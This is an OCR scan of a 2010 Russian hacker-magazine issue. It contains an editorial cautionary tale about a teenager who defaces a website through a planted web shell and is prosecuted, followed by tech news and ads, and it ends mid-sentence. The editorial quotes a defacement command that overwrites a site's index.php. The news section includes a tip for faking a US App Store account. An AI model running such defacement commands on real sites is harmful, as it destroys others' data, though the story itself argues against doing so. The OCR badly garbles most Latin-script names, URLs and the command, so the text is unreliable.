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Знакомься: Олег Пиндец, 1 7 лет, проживает по адресу 
г. ВерхниеЛохи.ул. Ленина, дом 1 . Зайдя 26 августа 
2010 года на интернет-форум (огит.апР-Ьгит д, Олег 
увидел интересную тему «Зацените залитый шелл». 

В теме указывалось, что на ѵѵеЬ-сайте ѵѵѵѵѵѵ.иррег- 
ІоЫ-опІіпе.ги содержится ошибка в стандартной СМ5. 

И один умелецуже закачал туда шелл и предлагает 
всем желающим попробовать себя в роли кул-хацкера, 
перейдя по представленной ссылке. 

Попробовать себя в роли кул-хацкера ОлегПиндец 
хотел уже очень давно, поэтому слюни потекли поего 
щеке очень обильно, а сердечко ускорило темп под 
действием выделившихся гормонов. Перейдя по ссылке 
и потыкав по ссылочкам установленного г57зЬеИ, Олег 
был вне себя от радости и груза свалившегося на него 
счастья. Ведь в тот момент вся судьба ѵѵеЬ-сайта ѵѵѵѵѵѵ. 
иррег-ІоЫ-опІіпе.ги находилась в его руках! 

Чтобы зафиксировать в веках этот счастливый момент, 
Олег Пиндец решил выполнить одну команду, которую 
скопировал все стой же чудесной форумной ветки: 

$ есЪо "Ьискесі Ьиу тедатогсі! Сгі кг До ап- 

Ді-Догит.ги кги ! " > /ѵ\шм/риЪ1іс_Ъкт1/іп- 

сіех . ркр 

Порадовавшись неожиданным приключениям и 
похваставшись перед друзьями крутым скриншотом, 
Олег Пиндец благополучно забыл про всю историю 
ровнодо9утра 12декабря 2010 года. 



Этот день начался для Олега Пиндец необычно: толпа 
грубых розовощеких мужчин мощными ударами ног 
свалила его китайскую железную дверь с хилых петель 
и провела задержание подозреваемого в совершении 
преступлений по статьям 272 и 273УКРФ. 

В ходе следствия Олег Пиндец полностью признал 
своювинуи раскаялся в содеянном. Учитывая помощь 
следствию, а также положительную характеристику 
с места учебы, Верхнелоховской Городской суд 
приговорил Олега Пиндец 1993 года рождения к 
штрафу в 50 000 рублей и 3 годам лишения свободы 
условно. 

Воттакая вымышленная, но крайне реалистичная по 
теперешним временам история. И моральтуттоже 
очень простая: 

1. В любых обстоятельствах нужно иметь свою голову 
на плечах, потому что отвечатьза свои действия всегда 
приходится самостоятельно. 

2. Несмотря на косность, непрофессионализм и 
медлительность силовых органов, они уже давно 
научились определять местожительства не только 
по ір-адресу, но и по нику/посту на форуме, а 
использование таких чудесных средств защиты, как 
зоскз/ѵрп, не всегда оказывается эффективным. 

3. И главная мораль: если хочется что-то поломать, то 
ставь себе на ІосаІЬозІ какой-нибудь ОѴІ_ и ломай сам 
себя на здоровье. И всегда, в любом случае, соизмеряй 
приобретаемое с масштабом потенциальныхтраблов. 



пікііогг, гл. ред.Х 
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РЕБУТ НОН-СТОПОМ 

МсАіее 

Апдейт МсАІее ОАТ5958, выпущенный, как нетрудно дога- 
даться, кошеломительно популярному на западе антивирусу 
МсАІее, привел кочень неприятному сбою в работе ком- 
пьютеров под управлением ѴѴіпбоѵѵзХР 5РЗ. Обновление 
считает, что процесс зѵсбозГехе (Зегѵісез) — это вирус ѴѴ32/ 
ѴѴесогІ.а, иуводитПКв бесконечный, беспросветный ребут. 
Стоитли говорить, что «благодаря» МсАІее и ихантивирю в 
вечную перезагрузкуушли машины множества коммерческих 
организаций, а также больниц, колледжей, институтов итак 
далее. В от это е р і с Та і И И хотя МсАІее уже экстренно выпустили 
следующий апдейт [ ѵіІ.паі.сот/ѵіІ/5958 іаІзе.Ьіт ]. который 
исправляет досадный баг, большинству пользователей лечить 
антивирус все равно придется вручную, из безопасного ре- 
жима, поуже опубликованным в Сети инструкциям. С такими 
антивирусами никаких вирусов не надо. 



Ты наверняка уже слышал о стартапе СЬаІгоиІеМе! [ сбаігоиіейе.сот ). который создал 
простой российский одинадцатиклассникАндрей Терновский. Простейшая идея — 
сайт, рандом но и анонимно связывающий двух пользователей с помощью видео и 
текстового чата — вызвала настоящий бум в сети (особенно среди дрочеров :]. Сайт 
был запущен в конце 2009 года, и уже в феврале 201 0 на ресурс и его создателя обру- 
шилась слава — о чате-рулетке рассказали «ЫеѵѵѴогкТітез», «РогЬез» и «ЫеѵѵѴогк 
Мадагіпе»; детище нашего школьника засветилось даже в ЗоіЛЬ Рагк. Юное дарова- 
ние, создавшее гениально простой стартап, на радостях отправилось в бизнес-турне 
по Америке, где и находится по сей день. Из-за океана и пришла информация о том, 
что Андрей задумался над внедрением в Сбаігоиіеііе функции «анонимной дружбы». 
Дело в том, что сейчас понравившиеся друг другу юзеры вынуждены обмениваться 
никнеймами, адресами почты, Бкуре, ІСО и так далее, куда они впоследствии и уходят 
общаться, оставляя «Рулетку» за бортом. Чтобы остановить этот отток пользователей 
и дать им возможность продолжать именно анонимное общение, Андрей и обещает 
новую фишку. Стоитзаметить, что многочисленные клоны, уже появившиеся в Сети, и 
без этого не могут даже близко сравниться с СЬаІхоиІеФе по посещаемости. 




ІРАБ В НАШИХ РУКАХ 

Говорят, что первым авиарейсом после старта продаж іРаб из Сан-Франциско в Москву 
прилетело... аж 1200 девайсов. Можно верить, а можно нет, но модный гаджет попал в 
руки редакции уже на следующей день после официального запуска: спасибо магазину 
аМас.ги ! Когда первая волна эйфории прошла, а девайс (при всей нашей сдержанности 
кслюням по поводу продукции Арріе) действительно впечатляет, мы смогли изучить 
гаджет чуть подробнее. Оказалось, правда, что загружать приложения изАррЗФге 
нельзя —такое ограничение введено для пользователей из России. Ксчастью, Арріе 
вданном случае несильнозаморачиваласьпо поводу проверокна этот счет, поэтому 
можно оченьлегко завести профайл в АррВіоге, прикинувшись истинным американ- 
цем и указав адрес в Штатах. После этого вновь появляется возможность загружать 
приложения какссамого іРасІ’а, так и через іТипез. Важно, что в интернете продается 
огромное количество ОіКСагсІ, которые можно приобрести с помощью пластиковой кар- 
ты, и таким образом пополнить счет для покупки уже платных приложений (остерегайся 
фейков]. Увы, публичного]аіІЬгаке’а еще нет, хотя Сеогде НоШ (он же Сеогде НоЫ уже 
показал скрины взломанного іРасГа. Адругиеумельцы уже сумели установить ѴѴіпсІоѵѵз 
95 с помощью эмулятора ВозсЬ. 
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ВЫБЕРИ СВОЙ 



Оцени стильные модели 
из новой серии сенсорных 
телефонов І_С: с больши- 
ми 3-дюймовыми дисплея- 
ми, легкие, удобные, много- 
функциональные. 

Соокіе - ЗМП-камера, 
распознавание рукопис- 
ного ввода текста. 

Соокіе РгезН - работа 
радио без гарнитуры, 
быстрый доступ к популяр- 
ным социальным сетям. 
Соокіе РІііз - поддержка 
ЗС-сетей, РызЬ Е-таіІ*. 
Переходи на современ- 
ный стиль общения. 



ѵѵѵ/ѵѵ.Ід.гіі 





СоокТе 1 ! 




Соокіе' 



Информационная служба Ю ЕІесТгопісз 8-800-200-76-76 
(бесплатная горячая линия по России). ѵ/ѵ/ѵ/.Ід.ш 



* Синхронизация с почтовым сервером 
‘* Мобильная связь третьего поколения 
Куки ****Куки Плюс *****Куки Фреш 



НА ПРАВАХ РЕКЛАМЫ 








МЕ6АЫЕѴѴ5 



ДЕТЕКТИВНАЯ ИСТОРИЯ - ІРНОИЕ НОВОГО ПОКОЛЕНИЯ 




Невероятная история приключилась с прототи- 
пом іРЬопе46 от компании... Арріе. 

Когда на сайте Оігтосіо появилась статья о 
том, что кто-то из сотрудников Арріе умудрил- 
ся потерять прототип новой трубки, которую 
официально должны были представить только 
летом, в это верилось струдом. Однако Оігтосіо 
явили публике полноценный обзор девайса 
с фотографиями, а также поведали отом, как 
выкупили этот странный аппарату парня, 
нашедшего его в баре Ооигтеі НаизЗіаисИ, за 
$5000! В Сети тутже вспыхнули жаркие споры 
отом, можетли это быть правдой (1 -е апреля 
все-таки уже прошло]. Тем временем выясни- 



лось, что вупомянутом питейном 
заведении в подходящее время 
действительно зависал сотрудник 
Арріе — Грей Пауэлл. У чувака, 
между прочим, был день рожде- 
ния. Бедолага работает (или уже 
«работал») в подразделении, ко- 
торое разрабатывает «звонилку» 
для іРЬопе. Из бара Пауэлл даже 
написал парутвитов, а потом, ухо- 
дя, просто забыл девайс на стуле. 
Нашедший трубку парень вообще 
сначала решил, что это ІРЬопе 
305, проигрался с ним, попро- 
бовал пофотографировать, но 
камера три раза крашилась. Собираясь честно 
вернуть аппарат владельцу, он унес его домой. 
То, что ІРЬопе какой-то странный, он заметил 
на следующий день, когда аппаратсначала 
дистанционно вырубили (у Арріе есть та кие 
сервисы специально на случай кражи или 
утери і РГіопе] , а потом у него вообще обнаружи- 
лась фронтальная камера... Чувакоказался на 
редкость сознательным — он звонил в Арріе по 
куче номеров, пытаясь объяснить им ситуацию, 
но в яблочной компании его слушать не стали, 
и позже никто так и не перезвонил. В итоге, 
трубка оказаласьу ребятс Оігтосіо за упомя- 
нутую круглую сумму. В 0І2тосІо церемониться 



с гаджетом не стали — его препарировали, 
изучили и засняли со всех сторон. Изменения 
таковы: появилась фронтальная камера, а 
обычная камера явно была улучшена итеперь 
снабжена вспышкой. Вместо 5ІМ-карты 
используется М і с го - 5 1 М . Разрешение экрана 
установить неудалось, но на глаз оно выше, 
чем утрубок прошлого поколения — пред- 
положительно 960 на 640 пикселей. Элект- 
ронная начинка девайса оказалась сильно 
уменьшена, но ІРЬопе при этом потяжелел 
на 3 грамма, и батарея оказалась больше 
обычной на 1 6%. Задняя крышка выполнена 
из стекла или керамики и, стало быть, должна 
хорошо пропускать сигнал. Дизайн стал более 
угловатым, что и послужило основным поводом 
для криков: «Это фэйк! Арріе не могли такое 
создать». Но іТипез определил загадочный 
аппарат как ІРЬопе. Народ в Сети еще долго 
могбы спорить натему«іРЬопе или фэйк», но 
конецдебатам положило письмо из Арріе. К 
0І2тосІо обратился Брюс Сьюэлл, старший 
вице-президенти генеральный юрисконсульт 
корпорации Арріе. Он попросил вернуть ком- 
пании Арріе принадлежащее ей устройство. 
Зато теперь общественность можетспоритьдо 
хрипоты, обсуждая, был это спланированный 
РР-вброс или же это действительно невероят- 
ная случайность. 



СПЕЦЫ ИЗ УНИВЕРСИТЕТА КАРНЕГИ-МЕЛЛОНА ВЫЯСНИЛИ: РИТМИЧНАЯ АНИМАЦИЯ 
ПРОГРЕСС-БАРА СУБЪЕКТИВНО «УСКОРЯЕТ» ЗАГРУЗКУ НА 1 0%. 

ѴѴЕВМОИЕУ И ЯНДЕКС. ДЕНЬГИ СНОВА ДРУЗЬЯ 



Не так давно ѴѴеЬМопеу и Яндекс. Деньги 
прекратили сотрудничество и обмен 
между своими системами из-за большого 
числа мошеннических переводов, чем 
доставили немало геморроя своим поль- 
зователям. Но на прошедшей недавно 



в Подмосковье конференции РИФ+КИБ 
Петр Дарахвелидзе, директор по развитию 
ѴѴеЬМопеу, заявил, что обмен между сис- 
темами «в ближайшее время» будет вос- 
становлен. По его словам, компаниям все 
же удалось найти консенсус в отношении 



интерфейса, который теперь будет рабо- 
тать непосредственно между их платеж- 
ными системами. Одним из обязательных 
условий для конвертации средств, судя по 
всему, станет полное совпадение имени 
пользователя в обеих системах. 



ДЖЕЙМС Г0СЛ ИНГ ПОКИНУЛ ОКАСЬЕ 




Совсем недавно мы писали отом, что компа- 
нию 5ип Місгозузіетз покинул известней- 
ший канадский ПО-разработчикТим Брэй, 
занимавший там до последнего времени пост 
директора по веб-технологиям. Произошло это 
из-за сделки на $7,4 миллиарда, в результа- 
те которой 5ип была поглощена компанией 
Огасіе. Но Брэй не стал последним разработ- 
чиком, оставившим новое-старое место рабо- 
ты. Теперь и Джеймс Гослинг — тоже канадец 
и тоже разработчик ПО с мировым именем, но, 



что важнее всего, автор языка 5аѵа (могучий 
человечище!], сообщил в своем блоге, что он 
уволился из Огасіе, и произошло это еще 2-го 
апреля. Гослинг искренне извинился перед 
всеми, кто ждал его в Питере, на конференции 
5ип ТесЬЭауз, на которой он не смог присутст- 
вовать, не являясь более сотрудником 5ип. 
Джеймстакже пишет, что пока не знает, каковы 
будутего дальнейшие планы, но с поисками 
новой работы он пока решил повременить и 
взял небольшой перерыв. 



► 006 
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ѴѴіпсІоѵѵз®. Жизнь без преград. А8У8 рекомендует ОС ѴѴіпсІоѵѵз 7. 




Ноутбуки АБІ)Б серии N 
Чистый звук. Яркий цист. 



Современная мультимедийная платформа с интерфейсом ІІ8В 3.0 



• Подлинная ОС ѴѴіпсІоѵѵз® 7 Домашняя расширенная 

• Новый процессор 2010 года Іпіеі® Соге™ І7 

• Превосходный звук с технологией ЗопісМазІег 

• Идеальное воспроизведение видео с технологией Ѵісіео Мадіс 

Ноутбук А51І5 Ы61ф оснащенный процессором Іпіеі® Соге™ І7 и подлинной операционной системой 
ѴѴіпсІоѵѵз® 7 Домашняя расширенная, открывает двери в мир компьютерных развлечений. 
Он идеально подходит для современных мультимедийных приложений. Так, его высокоскоростной 
интерфейс 115В 3.0 позволяет передавать файлы в 10 раз быстрее, чем 115В 2.0. Просмотр 
телевизионных передач и видео в форматах НО, прослушивание МРЗ - все это доступно 
с ноутбуком А51І5 N61 Т Мультимедийные качества моделей серии N впечатлят любого 
пользователя. Реализованные в них технологии ЗопісМазІег и Ѵісіео Мадіс обеспечивают 
поразительное качество звука и четкое, яркое изображение. С новым ноутбуком А5115 серии N мир 
компьютерных развлечений предстанет перед вами в совершенно новом свете и звуке. 

ѵѵѵѵѵѵ.азиз.ги Всемирная гарантия 2 года Горячая линия А51І5: (495) 23-11-999 



Информацию о том, где купить ноутбуки АЗСІЗ в Москве и Санкт-Петербурге, можно найти на сайте ѵѵѵѵѵѵ.азизпЬ.ги 

Архангельск: Формоза (8182) 65-79-95; Брянск: Артбук (4832) 687-444; Владивосток: В-Лазер (4232) 218-000; ДНО (4232) 300-454; Владимир: Компьютер-Имидж (4922) 33-19-66; 
Вологда: СИСТЕМА (8172) 529-400; Воронеж: РЕТ (4732) 77-93-39; Екатеринбург: Санрайз (343) 268-88-81; Буква (343) 22-22-025; Трилайн (343) 378-70-70; Клосс (343) 216-17-01; 
Норд 8-800-2000-787; Ижевск: Корпорация «Центр» (3412) 91-88-11; Казань: Ноутбукофф (843) 264-39-32; Киров: Технополис (8332) 480-888; Краснодар: Владос (861) 210-10-01; 
5ИР (861) 210-00-66; Липецк: Регард-тур (4742) 220-555; Нижний Новгород: Алтэкс (831) 411-87-87; Новосибирск: ГОТТИ (383) 362-00-44; Левел (383) 212-00-05; НОТА (383) 
304-10-10; Техносити (383) 22-33-770; Норильск: ІІ-іесб (3919) 46-73-36; Омск: РИТМ (3812) 20-05-08; Он-Лайн (3812) 200-490; Пермь: Ноутбукофф (342) 270-01-11; Ноутовъ (342) 
210-10-84; Псков: Все для ПК (8112) 72-72-75; Ростов-на-Дону: Иманго (863) 240-40-32; ЗОиШ (863) 261-87-65; КМ Союз (863) 295-50-10; Самара: Прагма (846) 270-17-01; 
Саратов: АТТО (8452) 444-111; Компьюмаркет (8452) 22-36-36; Сургут: Компьютерный супермаркет «ПЕРВЫЙ» (3462) 247-000; Сыктывкар: Эльф (8212) 29-10-83; Томск: Интант 
(3822) 56-00-56; Тюмень: Арсенал+ (3452) 797-070; Ульяновск: Симбирск-М+ (8422) 420-003; Уфа: Кламас (347) 291-21-12; ФортеВД (347) 260-00-00; Чебоксары: Квартон (8352) 
62-55-51; Якутск: Респект (4112) 44-55-44 

Іпіеі, логотип Іпіеі, Іпіеі Іпзісіе, Іпіеі Соге и Соге Іпзісіе являются товарными знаками корпорации Іпіеі на территории США и других стран. 




Товар сертифицирован, на правах рекламы. 







МЕ6АЫЕѴѴ5 



ЕАСЕВООК К НАМ ПРИХОДИТ 




Компания Ра се Ьоо к держит свое слово — ещевпрошлом году 
стало известно, что в 2010-м крупнейшая в мире социальная сеть 
планирует активно расширяться в странах восточной Европы, и эта 
информация начинает подтверждаться, а планы — претворяться в 
жизнь. РасеЬоок вместе со своими 400 миллионами юзеров и сотня- 
ми компаний-партнеров по всему миру готовится открыть в России 



свое представительство. Компания уже начала вести переговоры 
с нашими мобильными операторами, в частности обсуждались 
вопросы оплаты услуг РасеЬоок’а посредством 5М5. Время пока- 
жет, что из всего этого выйдет, а пока мы напомним, что компания 
МуЗрасе тоже пыталась открыть в России свой офис, ноихначина- 
ние потерпело фиаско. Ну и, конечно, очень интересна реакция на 
все это нашего дорогого «ВКонтакте» с его 68 миллионами учет- 
ных записей, который пока удерживает пальму первенства среди 
социальных сетей России и стран СНГ. Как известно, «ВКонтакте» 
является фактическим клоном РасеЬоок’а многолетней давности, 
по крайне мере, если говорить о дизайне. В технологическом плане 
РасеЬоок ушел далеко вперед. Так, на недавней конференции Ш 
была представлена технология ОрепСгарЬ, позволяющая социали- 
зировать любые сайты, подстраиваясь под пользователя на основе 
его профиля и списка друзей в РасеЬоок. Причем это работает, 
даже если тот на сайте в первый раз. Технология пришла на смену 
РасеЬоок Соппесі (использовался до последнего времени сотней 
миллионов пользователей Сети]. Новая система интеграции сайтов 
с РасеЬоок позволит интер нет- ресурсам получать доступ ко всем 
общедоступным данным и связям пользователя в режиме реального 
времени и, в отличие от РасеЬоок Соппесі, сохранять эту информа- 
цию (ранее срок ее хранения на сторонних ресурсах был ограничен 
24 часа ми]. Ох, теперь информацию в профиле придется прописы- 
вать с особой осторожностью! 



ВШ-РАѴ 0І5С А550СІАТКШ СООБЩИЛА. НТО СКОРО ЕМКОСТЬ «ОДНОРАЗОВЫХ» 
ВШ-РАѴ ДИСКОВ УВЕЛИЧИТСЯ Д0 1 00 И 1 28 ГБ. А ПЕРЕЗАПИСЫВАЕМЫХ - 

Д0 100 ГБ. 



УТЕНКА В 60061-Е? Соодіе 



После зимнего взлома ряда крупных западных 
компаний, в число которых входила и Ооодіе, 
прошлоуже немало времени, а новые подроб- 
ности до сих пор продолжают всплывать. На- 
помним, что в декабре Соодіе якобы подвергся 
атаке со стороны неизвестныххакеров. Впрочем, 
представители поискового гиганта почти сразу 
заявили, что, по ихданным, взлом был заказ- 
ной, и следы его ведут в Китай. Это и послужило 
причиной последующего громкого конфликта 



с властями Поднебесной. Теперьже издание 
ТЬе ЫеѵѵУогкТітез сообщает, что, согласно 
полученной ими информации, во времятой атаки 
хакерам удалосьувести у Ооодіе специальную 
прогу под названием Оаіа, которая контролиро- 
вала доступ к большинству сервисов компании. 

В Ооодіе эту информацию комментировать 
отказались, только в очередной раз подчеркну- 
ли, что никаких личных данных пользователей 
хакерам заполучить неудалось. Эта информация 



несколько настораживает, особенно в свете того, 
что последние несколько недель со всего мира 
поступают сообщения отобеспокоенных поль- 
зователей ОМаіІ, заметивших, чтосихящиков 
рассылается спам, а в логах фигурируютлевые 
ІР-адреса. Странной эпидемии подверглись все: 
линуксоиды, виндузятники, маководы; сходная 
картина наблюдается и по браузерам — полный 
букет, на любой вкус. Эти события Соодіе пока 
тоже никакие комментирует. 



ОФИЦИАЛЬНЫЙ АРХИВ ТВИТОВ ЧЕЛОВЕЧЕСТВА 



На днях Метт Рэймонд, директор по коммуникациям 
Библиотеки Конгресса, поведал мируотом, что скоро 
в Вашингтоне получит постоянную пропискуархив 
сервиса Тѵѵіііег. Это совсем не шутка, все серьезно — 
все твиты человечества, начиная смарта 2006 года, 
лежащие в общем доступе и незащищенные настрой- 
ками приватности отныне будут храниться в цифровом 
виде в крупнейшей библиотеке мира. Учитывая, что 
количествотвитов исчисляется миллиардами и с каж- 
дым днемтолько увеличивается, объем информации 
простоаховый. Но крупнейшей на Земле библиотеке не 
привыкать -здесьуже и без того хранится 20терабай- 



тов информации (размер р Іа і п -те кета ! ] , а руководство 
заведения искреннеуверено, что не книгами едиными 
жив человек. В Библиотеке Конгресса считают, что 
множество записей в Тѵѵійег представляют историчес- 
кий интерес, и в этом с ними трудно не согласиться, учи- 
тывая, что аккаунты вТѵѵійегестьу политиков и даже у 
президентов, у звезд шоу-бизнеса и у самых различных 
деятелей культуры и искусства. Содержащиеся в архиве 
твиты будут доступны спустя полгода после публикации, 
и использовать их можно будет для некоммерческих 
исследований, публичного показа в самой библиотеке 
или же для сохранения. 




► 008 
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Код. Он есть во всем, что нас окружает. Он всюду, куда бы ты 
ни посмотрел. Он таит в себе неограниченные возможности. 
Используя их, ѴізиаІ Біисііо 2010 поможет реализовать любые 
идеи с помощью новых инструментов, которые перевернут 
твое представление об эффективной работе, начиная 
с дизайна и разработки и заканчивая запуском проекта. 



МИР КОДА В ТВОИХ РУКАХ. 

А НА ЧТО СПОСОБЕН ТЫ С ѴІ51ІАІ_ 5ТІЮІО 2010? 



МІСГОЙОІГ 



Місгезоіі 



ѴізиаІ 5іис1іо 



/*КОД ПОВСЮДУ*/ 



Узнай больше на ѵ$2010.ги 





Ц-ННЕЯ 










Сфотографируй 



Сфотографируй этот знак и получи последние новости о ѴІБиаІ БШсІіо. 

Загрузи бесплатное приложение для своего мобильного на ННрУ/дейад.тоЬі. 



© 2010 Місгобоіі; Согрогайоп. Все права защищены. Владельцем товарных знаков МісгозоЙ, ѴізиаІ Зіисііо 2010, зарегистрированных на территории США и/или других стран, и владельцем 
авторских прав на их дизайн является корпорация МісгозоШ Другие названия компаний и продуктов, упомянутых в тексте, могут являться зарегистрированными товарными знаками 
соответствующих владельцев. 

Реклама. 





МЕ6АЫЕѴѴ5 



ТРОЯНЕЦ-АНТИПИРАТ 




Давно известно, что «свято место пусто не бывает», так что, пожалуй, троян, 
который спекулирует нелегальностью использования торрентов, даже как- 
то подзадержался. Дабы развести доверчивых пользователей на деньги, 
трой действует по следующей схеме: порывшись на компьютере и найдя 
НоггепКфайлы, прога выплевываетокно с предупреждением о нарушении 
копирайта, блокируя систему. Западные пользователи, которые и так скоро 
будут покрываться холодным потом от одного только упоминания оторрен- 
тах, уже чувствуют себя некомфортно, атроянец, неоставляя им выбора, 
посылаетихна выглядящий весьма официально сайт ѵѵѵѵѵѵ.ісрр-опііпе.сопп 
Ресурс, понятное дело, поддельный, хотя организация ІСРР и существует 
на самом деле. Ктомуже сайт пестрит страшными аббревиатурами РІАА, 
МРАА и ТЬе СоругідЫ: АШапсе, которыетоже очень известны в деле войны 
с контрафактом. Кэтому моменту рядовой пользователь, должно быть, уже 
пребывает в ужасе, и тут-то ему предлагают за платить «штраф», попутно 
напоминая, что мера наказания за такие правонарушения в худшем случае 
может составлять до 5 летлишения свободы или $250000. Сумма «штрафа», 
тем временем, равняется примерно$400. Если юзер всееще неубежден 
и отказывается платить, хитрая прога ругается окошком предупреждения, 
где угрожает сообщитьо нелегальныхдеяния пользователя в соответст- 
вующиеорганы. Какименнотроян попадаетна машину, и чьемуже перу 
при надлежит эта креативная поделка — неизвестно. 



ГОЛЛАНДЦЫ ИЗ КОМПАНИИ ЛОВЕ СОСТАВИЛИ ТОП ЯЗЫКОВ 
ПРОГРАММИРОВАНИЯ. НА 1-ОМ МЕСТЕ ОКАЗАЛСЯ С. МА ЗАНЯЛ 2-Е МЕСТО. А 
С++ СОХРАНИЛ СВОЮ ПОЗИЦИЮ НА 3-ЕЙ СТРОКЕ РЕЙТИНГА. 



Е0КТНЕН0М! 




Радость в стан геймеров и поклонников хорошего звука принесла компания Сгеабѵе, 
объявив о выпуске новых гарнитур ЗоипсІ ВІазІегѴѴогІб оШагсгаК Неабзеі: и ЗоипсІ 
ВІазІегѴѴогІб оШагсгаК ѴѴігеІезз Неасізеі: (проводная и беспроводная версии соот- 
ветственно). Из названия уже понятно, что новинки в первую очередь придутся по 
душе поклонникам одной из самыхуспешных ММОРРО на нашей планете — ѴѴо Кб об 
ѴѴагсгаК. Дизайн гарнитур всецело соответствует игровой вселенной ѴѴоѴѴ, а также 
предоставляет игроку возможность обозначить свою принадлежность к Альянсу или 
Орде с помощью сменных накладок и выбрать один из 1 6 миллионов программиру- 
емых цветов подсветки. Изтехнологических особенностей девайса отметим сле- 
дующие: повышенное (благодаря технологии ТНХТгиЗіибіо РС) качество звучания, 
отсоединяемый микрофон профессионального уровня с функцией шумоподавления 
Зііепсег, технология ѴоісеРХ, позволяющая изменять голос, изображая разных персо- 
нажей и существ ѴѴо Кб оІѴѴагсгаК. Для беспроводной версии немаловажен и аккуму- 
лятор, который может заряжаться даже во время использования девайса. В продаже 
гарнитуры появятся уже в мае по ориентировочной цене 6899 руб. за проводную и 
9299 руб. за беспроводную версии. 



1С0 ПРОДАЛИ! 

Некоторое время назад корпорация АОИ окончательно определилась 
со списком претендентов на покупку I СО ; ими стали фонд Оідбаі 5ку 
Тесбпоіодіез (владельцы Маіі.ги], холдинг 
«ПрофМедиа» (владельцы медиа-холдин- 
га ВатЫег Мебіа) и китайская компания 
Тепсепі: (владелец крупнейшего в мире 
мессенджера 00, чья основная аудитория 
сосредоточена в Китае). Напомним, что 
решение продать популярный мессенджер 
вызрело в АОИ еще в конце прошло года, и 
с того самого времени для «Аськи» подыс- 
кивали покупателя. Самой Атегіса Опііпе 



в 1 998 году I СО обошлась более чем в 400 миллионов долларов. 28 
апреля фонд ИЗТ Юрия Мильнера, Григория Фингера и Алишера 
Усмановавсе-таки до говорилась с американской АО Г о выкупе у нее 
сервиса мгновенных сообщений I СО за $187,5 млн. 18 миллионов 
русскоязычных пользователей — получается $1 0 за лицо :) 




► ОІО 
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ВЫИГРАН ЖЕЛТЫЙ кабриолет и другие яркие призы на 



\Л/Ши/.МУСНЕ8ТЕВР1ЕЮ.Ви 



введи код КНА871 8!ШВЗ 

НА САЙТЕ, ЧТОБЫ ПОЛУЧИТЬ БОНУС! 

КОДЫ УЧАСТИЯ - В КАЖДОЙ ПАЧКЕ СНЕ8ТЕВРІЕЮ. 



РЕГИСТРИРУЙ КОДЫ С 12 АПРЕЛЯ ПО 30 ИЮНЯ 2010 ГОДА ВКЛЮЧИТЕЛЬНО. ПРОГРАММА ПРОВОДИТСЯ С 12 АПРЕЛЯ ПО 30 ДЕКАБРЯ 2010 ГОДА 
ВКЛЮЧИТЕЛЬНО. ПОДРОБНУЮ ИНФОРМАЦИЮ ОБ ОРГАНИЗАТОРЕ ЭТОЙ ПРОГРАММЫ, О ПРАВИЛАХ ЕЕ ПРОВЕДЕНИЯ, КОЛИЧЕСТВЕ ПРИЗОВ 
ИЛИ ВЫИГРЫШЕЙ ПО РЕЗУЛЬТАТАМ ПРОГРАММЫ, СРОКАХ, МЕСТЕ И ПОРЯДКЕ ИХ ПОЛУЧЕНИЯ ИЩИ НА \ЛЛЛЛЛ/.МѴСНЕ$ТЕВРІЕІ_О.ВО 




МЕ6АЫЕѴѴ5 



ПОПОЛНЕНИЕ В СТРОЮ 
МОНОБЛОЧНЬ хпк 

В конце апреля компания НР объявила о пополнении семейства 
настольных компьютеров и показала миру новинки НР АИ-іп-Опе 200. 
Свежие моноблоки существенно помогутлюдям, которых волнует 
вопрос экономии места без потери мощности — они объединяют до 13 
кабелей в одном, при этом обеспечивая стольже высокую произво- 
дительность как и ПК в традиционных Іоѵѵег-кузовах. АИ-іп-Опе 200 
комплектуются НО-дисплеем диагональю 21 .5“ со светодиодной под- 
светкой. Экран можно наклонять под углом до 30 градусов и свободно 
поворачивать в любую сторону; при желании моноблок также можно 
закрепить на стене. Какуже было сказано выше, вместо обычного 
клубка проводов к АИ-іп-Опе 200тянется лишь кабель питания, но эти 
скромные габариты таятв себе процессор Іпіеі Репбипп Е5400 стакто- 
вой частотой 2.7 ГГц, 4 Гб оперативной памяти ООРЗ, интегрированную 
графику I піеі СМАХ4500НО и жесткий дискобъемом 500 Гб. Система 
также оснащена встроенными веб-камерой и микрофоном, беспровод- 
ным адаптером 802.1 1 Ь/д/ п и интегрированными стерео-динамиками. 
В комплект входят беспроводные мышь и клавиатура. Цена девайса 
составит примерно 699 евро, и начинать искать его в продаже можно с 
и ю н я те куще го года . 




«МЕЛКОМЯГКИЕ» РАПОРТУЮТ: ЗА 
П0ЛГ0ДА ИМИ БЫЛО ПРОДАНО БОЛЕЕ 
100 МЛН. ЛИЦЕНЗИЙ Ш00ѴѴ5 7 . 



КУПИЛ ХАРД, КИНО В ПОДАРОК 

Неожиданное известие пришло от голливудского гиганта Рагатоипі 
Оідіііаі Епіеііаіптепі и компании Зеадаіе — они объявили о начале 
сотрудничества, благодаря которому жесткие диски серии ЕгееАдепібо 
будут продаваться с уже записанными на борту фильмами. Разумеется, 
все совершенно легально, однако неза «спасибо». Ра га то и пі: РісШгез 
поделилась с «железным» производителем 21-ой кинолентой, но бес- 
платным будеттолько один фильм — ЗіагТгек (2009). Чтобы посмотреть 
остальные 20, придется раскошелиться на 1 0-1 5 баксов, зарегистриро- 
ваться на сайте Беадаіе и приобрести там специальный код доступа. Все- 
го под кино на 500-гигабайтном винте выделено 50 Гб, и все загруженные 
туда фильмы могут похвастаться ОѴЭ-качеством и РРМ-защитой. Дэйв 
Мосли, вице-президент Эеадаіе, уверяет, что такой маркетинговый ход 
являетсяуникальным и инновационным решением, открывающим перед 
потребителями легкий путь к получению различного мультимедийного 
контента. Цена модели емкостью 500 Гб составит$140. 

ИНТЕРНЕТ-МАГАЗИН КУПИТ ДУШИ. НЕДОРОГО. 

Просто отличный способ продемонстрировать, что никто не читает пользова- 
тельскихсоглашений, нашел британский онлайн-магазин батеЗіабоп. Хозя- 
ева ресурса по-тихому добавили в соглашение следующий пункт: «Размещая 
заказ на этом веб-сайте 1 числа 4 месяца 2010 года н.э., вы соглашаетесь 
предоставить нам возможностьзаявлятьо наших правах, сейчас и всегда, на 
вашу бессмертную душу, не подлежащую передаче другому лицу. Если мы по- 
желаем воспользоваться данной возможностью, вы соглашаетесь отказаться 
от вашей бессмертной души и любых претензий на неевтечениеб (пяти) 
рабочихдней с момента получения письменного уведомления отдатезабоп. 
со.икили его авторизованных представителей». Также уточнялось, что «ком- 
пания вправезатребовать душу через послание, состоящее из шестифуговых, 
горящих пламенем букв, и при этом не несет никакой ответственности за 
поврежденное огнем имущество». Для внимательных пользователей была 
возможность отказаться от продажи душ и — для этого нужно было перейти по 
соответствующемулинку. Глазастым покупателям, которые заметили шуточ- 
